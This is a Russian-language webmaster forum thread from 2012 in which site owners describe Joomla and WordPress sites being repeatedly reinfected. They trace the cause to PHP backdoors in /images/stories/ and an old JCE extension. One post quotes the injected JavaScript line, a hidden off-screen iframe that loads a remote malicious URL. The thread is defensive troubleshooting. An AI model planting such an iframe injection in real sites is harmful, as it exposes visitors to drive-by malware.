Проблемы с сайтом, внедрены вредоностные коды на сайте
Страницы: Пред. 1 2 3 4 5 След.
Проблемы с сайтом, внедрены вредоностные коды на сайте
я не знаю. удалить код можно, но он появляется опять.
подобные штуки у меня бывали, но сейчас слишком все необычно.

файлы записываются не по ftp, так как смена паролей не помогает, и в логах пусто.

возможно на сервер залит какой-то php-скрипт, который это делает. или уязвимость в джумле.
но тогда непонятно, почему восстановление сайтов из бэкапов помогает только на 10 минут.
Аналогичная проблема. Касперский ругается на все сайты. Другие антивирусы молчат. Заражены сайты с разными версиями joomla, а так же worppress. За день было замечено: Распространяется мгновенно. Через 1 час - 1,5 часа меняет ссылку в айфрейме. Все они располагаются на одном хостинге. Смена паролей от фтп не помогает. После полной заливки чистых сайтов через 10-15 минут все js файлы в конце кода снова заканчиваются строчками
Код
 ;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;"
 src="dwdqodil.qhigh.com/b5e7875e8b414bb648b26.bav?11"></iframe>');
Поисковые системы пишут о вреде. Каспер не пускает на сайты.
На сервере isp manager.
www.h-online.com/open/news/item/Joomla-sites-misused-to-deploy-malware-1766841.html]Вот статья на похожую тему. Там во всем винят jce старых версий. Если у кого есть подскажите, может вместе начнем копать в этом направлении. У меня при заливке сайтов заново и обновлении/удалении jce происходит заражение. остается ток один вариант проверять каждый сайт на отдельном аккаунте. Но думаю это (около 40 сайтов) займет довольно огромное количество времени. Подскажите кто нибудь пожалуйста, что можно сделать. Спасибо заранее.
И у меня такая же проблема.
Простые HTML сайты не затронуты. Только сайты с БД заражены.
Мне кажется началось все это в промежуток между 19 и 21 декабря 2012 года. Раньше все было ОК.
Хостинг JustHost. Техподдержка  JustHost говорит: решение ищите сами, проблемы вирусов на плечах самих клиентов.
Какой у кого хостинг?
Что делать? smile:confused:
Цитата
Сергей Моисеев пишет:
И у меня такая же проблема.
Простые HTML сайты не затронуты. Только сайты с БД заражены.
Мне кажется началось все это в промежуток между 19 и 21 декабря 2012 года. Раньше все было ОК.
Хостинг JustHost. Техподдержка JustHost говорит: решение ищите сами, проблемы вирусов на плечах самих клиентов.
Какой у кого хостинг?
Что делать? smile:confused:
У меня рег.ру. Говорят тоже обновлять и исправлять. Вобщем пока не уверен, но что то вроде выделил. Отделил сайты на новой joomla и wordpress. Старые (1.5 joomla) перекидываю на другой аккаунт. Больше часа никаких зараженных скриптов. Теперь надо выделить из пяти старых виновника дырки. Думаю их по одному включать и наблюдать. Может быть это просто затишье перед бурей и я не прав. Может с утра опять все сайты подцепят. О результатах экспериментов со старыми версиями joomla отпишусь. Копайте в сторону jce. Где читал везде пишут на них.
Изменено: Владимир Сергеев - 22 Декабря 2012 04:07
Цитата
Сергей Моисеев пишет:
И у меня такая же проблема.
Простые HTML сайты не затронуты. Только сайты с БД заражены.
Мне кажется началось все это в промежуток между 19 и 21 декабря 2012 года. Раньше все было ОК.
Хостинг JustHost. Техподдержка JustHost говорит: решение ищите сами, проблемы вирусов на плечах самих клиентов.
Какой у кого хостинг?
Что делать? smile:confused:
Если быть точной 19 как раз только гости ушли и началось....
Перезаливка сайта регулярная смена паролей, попытки догнать его до 1.5.26 + усиление безопасности, но начинать с проверки своего компа у меня был бекдор
на двух сайтах с joomla 1.5, на которых был установлен jce, в папке /images/stories/ нашел подозрительные php скрипты.
удалил их, заражения прекратились.
Проблема обычно с jce. Судя по всему по Рунету продят сразу несколько разновидностей одного и того же виря.
Недавно описывал процедуру fstrange.ru/coder/about_all/joomla-poisk-virusov.html]лечения Джумлы у себя в уютном.
Обычно исполняемая часть прячется в папке /images и\или ее подпапках. Там php файл с шифрованным телом.  Смело можно удалять. С него заражаются js файлы.
Цитата
rt23 пишет:
на двух сайтах с joomla 1.5, на которых был установлен jce, в папке /images/stories/ нашел подозрительные php скрипты.
удалил их, заражения прекратились.
а как ты рнашел такой подозрительный скрипт скинь пример и в чем разница там..
Всем привет!
Сегодня столкнулся с такой  же проблемой. Все 10 сайтов на джумла заражены, на вордпрес еще не проверял, нашел вот такое /images/stories/.cache_izpx4z.php, но после ее удаления в течении 10 мин снова появляется...так что скорее всего еще где-то есть источник...продолжаю поиск.
Вроде решил проблему. Действительно в одном из сайтов в папке images/stories были php скрипты
cache_9gcgrw.php
koabook.php
seoTySP.php
story.php

joomla 1.5.26
Вроде дырка в jce старой версии за 2009 год (версия 1.5)
Изменено: Владимир Сергеев - 22 Декабря 2012 19:23
Цитата
Владимир Сергеев пишет:
Вроде решил проблему. Действительно в одном из сайтов в папке images/stories были php скрипты
cache_9gcgrw.php
koabook.php
seoTySP.php
story.php

joomla 1.5.26
Вроде дырка в jce старой версии за 2009 год (версия 1.5
объясни поэтапно как искал, лечил...может, что похожее есть, в каких файлах...папках ?story.php тоже есть
что за дырка в jce ?
Изменено: detalux - 22 Декабря 2012 20:51
в папке у меня /images/stories/   там ничего нету такого везде посмотрела.... где еще можно там посмотреть поискать?... 

вчера я на главной странице своего сайта увидела что там в сумом верхнем углу полосочка маленкая незаметная там я сделала код элемента этого и что нашла там был червь сделала два скрина... потом я написала хостерам об этом и скинула эти два скрина... и не знаю они убрали его или он убежал кудато ... что думаете?

у вас на моем сайте при входе посомтрите пожалуйста есть ли предупреждение? www.zapichi-recept.ru
Каспер 2013 молчит, судя по всему все ок у вас, мож уполз
в админ панеле сайта я хотела в настройки коментариев войти и смотрю мне пишет предупреждение прикиньте.... сейчас скрин покажу... что делать?
а касперский 2013 прямо сайт может проверять? а как себе такой поставить?
3333.jpg (210.61 КБ) [ Скачать ]
Страницы: Пред. 1 2 3 4 5 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
21:49 Как правильно покупать ссылки для поддомена? 
18:51 Роскомнадзор отказал в регистрации трети блогеров-десятитысячников 
12:53 где много готовых фавиконок 
22:59 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
12:32 «Хлебные крошки» в адресе сайтов исчезнут из результатов поиска Google 
23:27 Adfinity - Ваш надежный партнер в монетизации трафика 
16:55 Инструменты для массового постинга в WordPress 
01:53 Европейский эквайринг 
20:19 GoogleWalker - устранение конкурентов в Google Ads | Автоматизированная система склика | АНТИБАН 
16:39 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
11:07 Мобильные и Резидентные Прокси Для Соц Сетей | 3 Гб Бесплатно 
11:01 Защитим твой ресурс от блокировки Роскомнадзора 
10:09 BestChange – обменивать электронную валюту можно быстро и выгодно 
06:50 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
23:52 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
07:48 США готовят закон для уничтожения пиратских сайтов во всех странах мира 
02:50 Точные прогнозы на футбол 
02:10 [Новая партнерка] Goldbet Partners — прямой рекламодатель одноименного казино Goldbet 
21:19 С юмором по жизни! 
18:15 Telegram уничтожил официальный канал легендарного российского торрент-трекера 
18:19 Уникальный сервис SEO продвижения